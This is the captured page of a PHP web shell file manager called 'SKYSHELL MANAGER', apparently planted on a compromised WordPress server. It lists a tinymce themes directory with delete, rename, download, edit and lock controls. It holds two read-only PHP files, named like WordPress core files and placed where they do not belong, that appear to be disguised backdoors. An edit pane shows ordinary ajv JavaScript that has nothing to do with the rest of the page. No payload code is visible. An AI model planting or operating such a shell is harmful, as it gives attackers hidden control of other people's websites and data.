📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: _util.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.usePattern = exports.metaSchemaRef = void 0; const codegen_1 = require("ajv/dist/compile/codegen"); const META_SCHEMA_ID = "http://json-schema.org/schema"; function metaSchemaRef({ defaultMeta } = {}) { return defaultMeta === false ? {} : { $ref: defaultMeta || META_SCHEMA_ID }; } exports.metaSchemaRef = metaSchemaRef; function usePattern({ gen, it: { opts } }, pattern, flags = opts.unicodeRegExp ? "u" : "") { const rx = new RegExp(pattern, flags); return gen.scopeValue("pattern", { key: rx.toString(), ref: rx, code: (0, codegen_1._) `new RegExp(${pattern}, ${flags})`, }); } exports.usePattern = usePattern; //# sourceMappingURL=_util.js.map
Save